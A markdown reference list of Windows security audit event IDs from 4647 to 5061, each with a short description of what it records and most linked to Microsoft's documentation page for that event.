- [4647: User initiated logoff.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647)
- [4648: A logon was attempted using explicit credentials.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4648)
- [4649: A replay attack was detected.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649)
- [4650: An IPsec Main Mode security association was established. Extended Mode was not enabled. Certificate authentication was not used.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4650)
- [4651: An IPsec Main Mode security association was established. Extended Mode was not enabled. A certificate was used for authentication.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4651)
- [4652: An IPsec Main Mode negotiation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4652)
- [4653: An IPsec Main Mode negotiation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4653)
- [4655: An IPsec Main Mode security association ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4655)
- [4656: A handle to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656)
- [4657: A registry value was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4657)
- [4658: The handle to an object was closed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4658)
- [4660: An object was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4660)
- [4661: A handle to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661)
- [4662: An operation was performed on an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662)
- [4663: An attempt was made to access an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4663)
- [4664: An attempt was made to create a hard link.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4664)
- [4665: An attempt was made to create an application client context.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4665)
- [4666: An application attempted an operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4666)
- [4667: An application client context was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4667)
- [4668: An application was initialized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4668)
- [4670: Permissions on an object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4670)
- [4671: An application attempted to access a blocked ordinal through the TBS.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4671)
- [4672: Special privileges assigned to new logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672)
- [4673: A privileged service was called.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673)
- [4674: An operation was attempted on a privileged object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4674)
- [4675: SIDs were filtered.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4675)
- [4688: A new process has been created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4688)
- [4689: A process has exited.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4689)
- [4690: An attempt was made to duplicate a handle to an object.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4690)
- [4691: Indirect access to an object was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4691)
- [4692: Backup of data protection master key was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4692)
- [4693: Recovery of data protection master key was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4693)
- [4694: Protection of auditable protected data was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4694)
- [4695: Unprotection of auditable protected data was attempted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4695)
- [4696: A primary token was assigned to process.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4696)
- [4697: A service was installed in the system.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697)
- [4698: A scheduled task was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698)
- [4699: A scheduled task was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699)
- [4700: A scheduled task was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4700)
- [4701: A scheduled task was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701)
- [4702: A scheduled task was updated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4702)
- [4703: A user right was adjusted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703)
- [4703: A user right was adjusted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4703)
- [4704: A user right was assigned.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4704)
- [4705: A user right was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4705)
- [4706: A new trust was created to a domain.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4706)
- [4707: A trust to a domain was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4707)
- [4709: IPsec Services was started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4709)
- [4710: IPsec Services was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4710)
- [4711: May contain any one of the following:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4711)
- [4712: IPsec Services encountered a potentially serious failure.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4712)
- [4713: Kerberos policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4713)
- [4714: Encrypted data recovery policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4714)
- [4715: The audit policy (SACL) on an object was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4715)
- [4716: Trusted domain information was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4716)
- [4717: System security access was granted to an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4717)
- [4718: System security access was removed from an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4718)
- [4719: System audit policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4719)
- [4720: A user account was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720)
- [4722: A user account was enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4722)
- [4723: An attempt was made to change an account's password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4723)
- [4724: An attempt was made to reset an account's password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724)
- [4725: A user account was disabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4725)
- [4726: A user account was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4726)
- [4727: A security-enabled global group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4727)
- 4728: A member was added to a security-enabled global group
- [4729: A member was removed from a security-enabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4729)
- [4730: A security-enabled global group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4730)
- [4731: A security-enabled local group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4731)
- [4732: A member was added to a security-enabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4732)
- [4733: A member was removed from a security-enabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4733)
- [4734: A security-enabled local group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4734)
- [4735: A security-enabled local group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4735)
- [4737: A security-enabled global group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4737)
- [4738: A user account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738)
- [4739: Domain Policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4739)
- [4740: A user account was locked out.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4740)
- [4741: A computer account was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741)
- [4742: A computer account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4742)
- [4743: A computer account was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743)
- [4744: A security-disabled local group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4744)
- [4745: A security-disabled local group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4745)
- [4746: A member was added to a security-disabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4746)
- [4747: A member was removed from a security-disabled local group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4747)
- [4748: A security-disabled local group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4748)
- [4749: A security-disabled global group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4749)
- [4750: A security-disabled global group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4750)
- [4751: A member was added to a security-disabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4751)
- [4752: A member was removed from a security-disabled global group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4752)
- [4753: A security-disabled global group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4753)
- [4754: A security-enabled universal group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4754)
- [4755: A security-enabled universal group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4755)
- [4756: A member was added to a security-enabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4756)
- [4757: A member was removed from a security-enabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4757)
- [4758: A security-enabled universal group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4758)
- [4759: A security-disabled universal group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4759)
- [4760: A security-disabled universal group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4760)
- [4761: A member was added to a security-disabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4761)
- [4762: A member was removed from a security-disabled universal group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4762)
- [4763: A security-disabled universal group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4763)
- [4764: A group's type was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4764)
- [4765: SID History was added to an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4765)
- [4766: An attempt to add SID History to an account failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4766)
- [4767: A user account was unlocked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4767)
- [4768: A Kerberos authentication ticket (TGT) was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768)
- [4769: A Kerberos service ticket was requested.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769)
- [4770: A Kerberos service ticket was renewed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4770)
- [4771: Kerberos pre-authentication failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771)
- [4772: A Kerberos authentication ticket request failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4772)
- [4773: A Kerberos service ticket request failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4773)
- [4774: An account was mapped for logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4774)
- [4775: An account could not be mapped for logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4775)
- [4776: The computer attempted to validate the credentials for an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776)
- [4777: The domain controller failed to validate the credentials for an account.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4777)
- [4778: A session was reconnected to a Window Station.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4778)
- [4779: A session was disconnected from a Window Station.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4779)
- [4780: The ACL was set on accounts which are members of administrators groups.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4780)
- [4781: The name of an account was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4781)
- [4782: The password hash of an account was accessed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4782)
- [4783: A basic application group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4783)
- [4784: A basic application group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4784)
- [4785: A member was added to a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4785)
- [4786: A member was removed from a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4786)
- [4787: A non-member was added to a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4787)
- [4788: A non-member was removed from a basic application group.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4788)
- [4789: A basic application group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4789)
- [4790: An LDAP query group was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4790)
- [4791: An LDAP query group was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4791)
- [4792: An LDAP query group was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4792)
- [4793: The Password Policy Checking API was called.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4793)
- [4794: An attempt was made to set the Directory Services Restore Mode administrator password.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4794)
- [4798: A user's local group membership was enumerated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4798)
- [4799: A security-enabled local group membership was enumerated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799)
- [4800: The workstation was locked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4800)
- [4801: The workstation was unlocked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4801)
- [4802: The screen saver was invoked.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4802)
- [4803: The screen saver was dismissed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4803)
- [4816: RPC detected an integrity violation while decrypting an incoming message.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4816)
- [4817: Auditing settings on object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4817)
- [4818: Proposed Central Access Policy does not grant the same access permissions as the current Central Access Policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4818)
- [4819: Central Access Policies on the machine have been changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4819)
- [4826: Boot Configuration Data loaded.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4826)
- [4864: A namespace collision was detected.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4864)
- [4865: A trusted forest information entry was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4865)
- [4866: A trusted forest information entry was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4866)
- [4867: A trusted forest information entry was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4867)
- [4868: The certificate manager denied a pending certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4868)
- [4869: Certificate Services received a resubmitted certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4869)
- [4870: Certificate Services revoked a certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4870)
- [4871: Certificate Services received a request to publish the certificate revocation list (CRL).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4871)
- [4872: Certificate Services published the certificate revocation list (CRL).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4872)
- [4873: A certificate request extension changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4873)
- [4874: One or more certificate request attributes changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4874)
- [4875: Certificate Services received a request to shut down.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4875)
- [4876: Certificate Services backup started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4876)
- [4877: Certificate Services backup completed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4877)
- [4878: Certificate Services restore started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4878)
- [4879: Certificate Services restore completed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4879)
- [4880: Certificate Services started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4880)
- [4881: Certificate Services stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4881)
- [4882: The security permissions for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4882)
- [4883: Certificate Services retrieved an archived key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4883)
- [4884: Certificate Services imported a certificate into its database.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4884)
- [4885: The audit filter for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4885)
- [4886: Certificate Services received a certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4886)
- [4887: Certificate Services approved a certificate request and issued a certificate.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4887)
- [4888: Certificate Services denied a certificate request.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4888)
- [4889: Certificate Services set the status of a certificate request to pending.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4889)
- [4890: The certificate manager settings for Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4890)
- [4891: A configuration entry changed in Certificate Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4891)
- [4892: A property of Certificate Services changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4892)
- [4893: Certificate Services archived a key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4893)
- [4894: Certificate Services imported and archived a key.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4894)
- [4895: Certificate Services published the CA certificate to Active Directory Domain Services.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4895)
- [4896: One or more rows have been deleted from the certificate database.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4896)
- [4897: Role separation enabled.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4897)
- [4898: Certificate Services loaded a template.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4898)
- [4902: The Per-user audit policy table was created.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4902)
- [4904: An attempt was made to register a security event source.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4904)
- [4905: An attempt was made to unregister a security event source.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4905)
- [4906: The CrashOnAuditFail value has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4906)
- [4907: Auditing settings on object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4907)
- [4908: Special Groups Logon table modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4908)
- [4909: The local policy settings for the TBS were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4909)
- [4910: The group policy settings for the TBS were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4910)
- [4911: Resource attributes of the object were changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4911)
- [4912: Per User Audit Policy was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4912)
- [4913: Central Access Policy on the object was changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4913)
- [4928: An Active Directory replica source naming context was established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4928)
- [4929: An Active Directory replica source naming context was removed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4929)
- [4930: An Active Directory replica source naming context was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4930)
- [4931: An Active Directory replica destination naming context was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4931)
- [4932: Synchronization of a replica of an Active Directory naming context has begun.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4932)
- [4933: Synchronization of a replica of an Active Directory naming context has ended.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4933)
- [4934: Attributes of an Active Directory object were replicated.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4934)
- [4935: Replication failure begins.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4935)
- [4936: Replication failure ends.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4936)
- [4937: A lingering object was removed from a replica.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4937)
- [4944: The following policy was active when the Windows Firewall started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4944)
- [4945: A rule was listed when the Windows Firewall started.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4945)
- [4946: A change has been made to Windows Firewall exception list. A rule was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4946)
- [4947: A change has been made to Windows Firewall exception list. A rule was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4947)
- [4948: A change has been made to Windows Firewall exception list. A rule was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4948)
- [4949: Windows Firewall settings were restored to the default values.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4949)
- [4950: A Windows Firewall setting has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4950)
- [4951: A rule has been ignored because its major version number was not recognized by Windows Firewall.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4951)
- [4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4952)
- [4953: A rule has been ignored by Windows Firewall because it could not parse the rule.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4953)
- [4954: Windows Firewall Group Policy settings have changed. The new settings have been applied.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4954)
- [4956: Windows Firewall has changed the active profile.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4956)
- [4957: Windows Firewall did not apply the following rule:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4957)
- [4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer:](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4958)
- [4960: IPsec dropped an inbound packet that failed an integrity check.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4960)
- 4961: IPsec dropped an inbound packet that failed a replay check.
- 4962: IPsec dropped an inbound packet that failed a replay check.
- [4963: IPsec dropped an inbound clear text packet that should have been secured.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4963)
- [4964: Special groups have been assigned to a new logon.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964)
- [4965: IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI).](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4965)
- [4976: During Main Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4976)
- [4977: During Quick Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4977)
- [4978: During Extended Mode negotiation, IPsec received an invalid negotiation packet.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4978)
- [4979: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4979)
- [4980: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4980)
- [4981: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4981)
- [4982: IPsec Main Mode and Extended Mode security associations were established.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4982)
- [4983: An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4983)
- [4984: An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4984)
- [4985: The state of a transaction has changed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4985)
- [5024: The Windows Firewall Service has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5024)
- [5025: The Windows Firewall Service has been stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5025)
- [5027: The Windows Firewall Service was unable to retrieve the security policy from the local storage. The service will continue enforcing the current policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5027)
- [5028: The Windows Firewall Service was unable to parse the new security policy. The service will continue with currently enforced policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5028)
- [5029: The Windows Firewall Service failed to initialize the driver. The service will continue to enforce the current policy.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5029)
- [5030: The Windows Firewall Service failed to start.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5030)
- [5031: The Windows Firewall Service blocked an application from accepting incoming connections on the network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5031)
- [5032: Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5032)
- [5033: The Windows Firewall Driver has started successfully.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5033)
- [5034: The Windows Firewall Driver was stopped.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5034)
- [5035: The Windows Firewall Driver failed to start.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5035)
- [5037: The Windows Firewall Driver detected critical runtime error. Terminating.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5037)
- [5038: Code integrity determined that the image hash of a file is not valid. The file could be corrupt due to unauthorized modification or the invalid hash could indicate a potential disk device error.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5038)
- [5039: A registry key was virtualized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5039)
- [5040: A change has been made to IPsec settings. An Authentication Set was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5040)
- [5041: A change has been made to IPsec settings. An Authentication Set was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5041)
- [5042: A change has been made to IPsec settings. An Authentication Set was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5042)
- [5043: A change has been made to IPsec settings. A Connection Security Rule was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5043)
- [5044: A change has been made to IPsec settings. A Connection Security Rule was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5044)
- [5045: A change has been made to IPsec settings. A Connection Security Rule was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5045)
- [5046: A change has been made to IPsec settings. A Crypto Set was added.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5046)
- [5047: A change has been made to IPsec settings. A Crypto Set was modified.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5047)
- [5048: A change has been made to IPsec settings. A Crypto Set was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5048)
- [5049: An IPsec Security Association was deleted.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5049)
- [5051: A file was virtualized.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5051)
- [5056: A cryptographic self-test was performed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5056)
- [5057: A cryptographic primitive operation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5057)
- [5058: Key file operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5058)
- [5059: Key migration operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5059)
- [5060: Verification operation failed.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5060)
- [5061: Cryptographic operation.](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5061)
